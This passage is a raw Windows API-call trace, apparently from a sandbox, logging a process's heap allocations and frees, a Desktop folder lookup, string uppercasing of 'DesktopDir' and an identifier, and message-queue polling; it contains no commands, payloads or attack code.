Size=0x10) returned 0x2aa9298 [0103.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0103.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0103.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0103.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0103.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0103.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0103.827] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0103.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0103.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0103.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0103.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0103.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0103.828] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0103.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0103.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6728 [0103.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0103.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0103.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0103.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0103.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0103.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0103.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0103.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0103.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0103.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0103.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0103.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0103.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0103.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0103.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75768 [0103.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6728 | out: hHeap=0x2af0000) returned 1 [0103.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0103.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0103.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0103.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0103.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0103.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0103.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0103.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71db8 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0103.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0103.829] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0103.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0103.829] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6178 [0103.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0103.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0103.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0103.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0103.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0103.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0103.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0103.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0103.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0103.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0103.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0103.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0103.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0103.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0103.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6178 | out: hHeap=0x2af0000) returned 1 [0103.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0103.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0103.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0103.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0103.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0103.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0103.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71de8 [0103.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0103.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0103.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0103.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0103.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ea8 [0103.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0103.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0103.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0103.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0103.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0103.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0103.831] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0103.831] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0103.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0103.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0103.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0103.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0103.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0103.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0103.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0103.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0103.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0103.879] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0103.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0103.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0103.879] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0103.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0103.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0103.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0103.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0103.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0103.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0103.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0103.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0103.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0103.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0103.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0103.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0103.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0103.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0103.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0103.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0103.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0103.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0103.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0103.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0103.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0103.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0103.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0103.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0103.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0103.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0103.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0103.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0103.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0103.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0103.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0103.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0103.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0103.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0103.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0103.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0103.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0103.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0103.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0103.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0103.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.882] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0103.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0103.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0103.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0103.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0103.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0103.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0103.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0103.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0103.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.883] RtlAllocateHeap 